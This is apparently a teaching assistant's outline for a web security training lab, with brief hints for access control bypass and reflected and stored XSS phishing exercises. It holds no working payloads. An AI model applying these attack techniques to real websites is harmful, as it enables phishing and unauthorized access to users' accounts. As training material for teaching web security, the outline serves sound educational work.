TA: Show student how to bring up Firefox Developer Tools
TA: Show student how to use the element inspector
TA: Show student how to take a look at network traffic in FIrefox
TA: Show student how to use ZAP (instead of webScarab)

For the exercises below, click Lesson Plan,
read the lesson, then go through the solution.
Be ready to explain the solution to the class.

Access Control Flaws
	Using an Access Control Matrix
		Just figure out which user has access to Account Manager
		so you know they are an admin.

	Bypass a Path Based Access Control Scheme
		Bring up Firefox Developer Tools, 

	LAB: Role Based Access Control
	Stage 1: Bypass Business Layer Access Control
	Stage 2: Add Business Layer Access Control
	Stage 3: Bypass Data Layer Access Control
	Stage 4: Add Data Layer Access Control
	
Code Quality
	Discover Clues in the HTML:
		Right click on part of the form and inspect
		element. In the source there you should find something.
Cross-Site Scripting (XSS)
	Phishing with XSS
		Note that the search query is reflected back to the
		user. FOr example <h1>That</h1>
		Use this to Phish (really yourself) and display
		a form which submits as described.
	Stored XSS Attacks
		As above, but this time put the form in a message.
		When the user (yourself) retrieves the message
		they see some HTML executed in their browser.